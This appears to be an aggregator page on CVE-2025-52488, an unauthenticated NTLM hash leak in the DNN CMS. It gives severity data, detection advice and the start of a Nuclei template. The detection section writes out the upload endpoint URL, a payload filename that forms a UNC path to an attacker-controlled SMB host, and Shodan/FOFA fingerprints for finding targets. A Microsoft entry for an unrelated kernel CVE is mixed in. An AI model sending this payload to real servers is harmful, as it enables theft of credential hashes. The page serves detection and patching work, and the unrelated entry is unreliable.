CVE-2025-52488
published 2025-06-21CVE-2025-52488: DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. In versions 6.0.0 to before 10.0.1, DNN.PLATFORM…
PriorityP185high8.6CVSS 3.1
AVNACLPRNUINSCCHINAN
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
29.34%
97.9th percentile
DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. In versions 6.0.0 to before 10.0.1, DNN.PLATFORM allows a specially crafted series of malicious interaction to potentially expose NTLM hashes to a third party SMB server. This issue has been patched in version 10.0.1.
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| dnnsoftware | dnn.platform | — | — |
| dnnsoftware | dnn.platform | >= 6.0.0 < 10.0.1 | 10.0.1 |
| dnnsoftware | dotnetnuke | >= 6.0.0 < 10.0.1 | 10.0.1 |
| msrc | cbl2_kernel_5.15.176.3-1_on_cbl_mariner_2.0 | — | — |
| msrc | cbl2_kernel_5.15.182.1-1_on_cbl_mariner_2.0 | — | — |
Detection & IOCsextracted from sources · hover to see the quote
url/Providers/HtmlEditorProviders/DNNConnect.CKE/Browser/FileUploader.ashx?PortalID=0&storageFolderID=1&overrideFiles=false↗
bytes↗
%EF%BC%BC%EF%BC%BC<interactsh-url>%EF%BC%BC%EF%BC%BCc$%EF%BC%BC%EF%BC%BCan.jpg
- →Detect exploit attempts by monitoring POST requests to the DNNConnect CKE FileUploader endpoint containing Unicode fullwidth reverse solidus characters (U+FF3C, encoded as %EF%BC%BC) in the multipart filename field, which are used to construct a UNC path to an attacker-controlled SMB server after Windows Unicode normalization. ↗
- →Confirm DNN presence on a target by checking for the 'dnn_IsMobile' Set-Cookie header in HTTP responses, or for body strings 'dotnetnuke', 'dnnconnect', or 'runtime error'. ↗
- →Fingerprint DNN installations via Shodan using favicon hash -1465479343 or FOFA icon_hash "-1465479343" to identify exposed targets. ↗
- →The attack is unauthenticated (no auth required) and targets the file upload endpoint with a crafted filename using Unicode fullwidth backslashes that normalize to standard backslashes, forming a UNC path (\\<attacker-smb>\c$\an.jpg) that triggers an outbound SMB connection leaking NTLM hashes. ↗
- →Monitor for outbound SMB (TCP 445) connections from the DNN web server process to external/unexpected hosts, which would indicate successful NTLM hash leakage triggered by this vulnerability. ↗
- →The exploit uses a multipart/form-data POST with Content-Type boundary '----WebKitFormBoundaryXXXXXXXXXXXX' and a filename containing percent-encoded Unicode fullwidth characters; look for %EF%BC%BC sequences in multipart filename fields in web server logs. ↗
- ·The vulnerability affects DNN Platform versions 6.0.0 up to (but not including) 10.0.1; version 10.0.1 contains the patch. Ensure version checks account for this full range. ↗
- ·The Nuclei template requires an OOB/interactsh interaction (DNS callback) to confirm exploitation; DNS interaction alone is the confirmation signal, meaning network-level egress blocking of SMB (TCP 445) to external hosts would prevent both exploitation and OOB confirmation. ↗
CVSS provenance
nvdv3.18.6HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
vulncheck8.6HIGH
vendor_msrc5.5MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
DNN.PLATFORM leaks NTLM hash via SMB Share Interaction with malicious user input
osv·2025-06-20
CVE-2025-52488 [HIGH] DNN.PLATFORM leaks NTLM hash via SMB Share Interaction with malicious user input
DNN.PLATFORM leaks NTLM hash via SMB Share Interaction with malicious user input
DNN.PLATFORM allows a specially crafted series of malicious interaction can expose NTLM hashes to a third party SMB server. This vulnerability is fixed in 10.0.1.
GHSA
DNN.PLATFORM leaks NTLM hash via SMB Share Interaction with malicious user input
ghsa·2025-06-20
CVE-2025-52488 [HIGH] CWE-200 DNN.PLATFORM leaks NTLM hash via SMB Share Interaction with malicious user input
DNN.PLATFORM leaks NTLM hash via SMB Share Interaction with malicious user input
DNN.PLATFORM allows a specially crafted series of malicious interaction can expose NTLM hashes to a third party SMB server. This vulnerability is fixed in 10.0.1.
VulnCheck
dnnsoftware DotNetNuke (DNN) Exposure of Sensitive Information to an Unauthorized Actor
vulncheck·2025·CVSS 8.6
CVE-2025-52488 [HIGH] dnnsoftware DotNetNuke (DNN) Exposure of Sensitive Information to an Unauthorized Actor
dnnsoftware DotNetNuke (DNN) Exposure of Sensitive Information to an Unauthorized Actor
DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. In versions 6.0.0 to before 10.0.1, DNN.PLATFORM allows a specially crafted series of malicious interaction to potentially expose NTLM hashes to a third party SMB server. This issue has been patched in version 10.0.1.
Affected: dnnsoftware DotNetNuke (DNN)
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://app.crowdsec.net/cti/cve-explorer/CVE-2025-52488; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2025-07-31&host_type=src
Microsoft
serial: sc16is7xx: convert from _raw_ to _noinc_ regmap functions for FIFO
vendor_msrc·2024-02-13·CVSS 5.5
CVE-2023-52488 [MEDIUM] serial: sc16is7xx: convert from _raw_ to _noinc_ regmap functions for FIFO
serial: sc16is7xx: convert from _raw_ to _noinc_ regmap functions for FIFO
FAQ: Is Azure Linux the only Microsoft product that includes this open-source library and is therefore potentially affected by this vulnerability?
One of the main benefits to our customers who choose to use the Azure Linux distro is the commitment to keep it up to date with the most recent and most secure versions of the open source libraries with which the distro is composed. Microsoft is committed to transparency in this work which is why we began publishing CSAF/VEX in October 2025. See this blog post for more information. If impact to additional products is identified, we will update the CVE to reflect this.
Mariner: Mariner
Linux: Linux
Customer Action Required: Yes
Remediation: CBL-Mariner Releases
Refer
No detection rules found.
Nuclei
DNN (DotNetNuke) - Unicode Path Normalization NTLM Hash Disclosure
nuclei·CVSS 8.6
CVE-2025-52488 [HIGH] DNN (DotNetNuke) - Unicode Path Normalization NTLM Hash Disclosure
DNN (DotNetNuke) - Unicode Path Normalization NTLM Hash Disclosure
DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. In versions 6.0.0 to before 10.0.1, DNN.PLATFORM allows a specially crafted series of malicious interaction to potentially expose NTLM hashes to a third party SMB server. This issue has been patched in version 10.0.1.
Template:
id: CVE-2025-52488
info:
name: DNN (DotNetNuke) - Unicode Path Normalization NTLM Hash Disclosure
author: assetnote,DhiyaneshDk,iamnoooob,pdresearch
severity: high
description: |
DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. In versions 6.0.0 to before 10.0.1, DNN.PLATFORM allows a specially crafted series of malicious intera
2025-06-21
Published
Exploited in the wild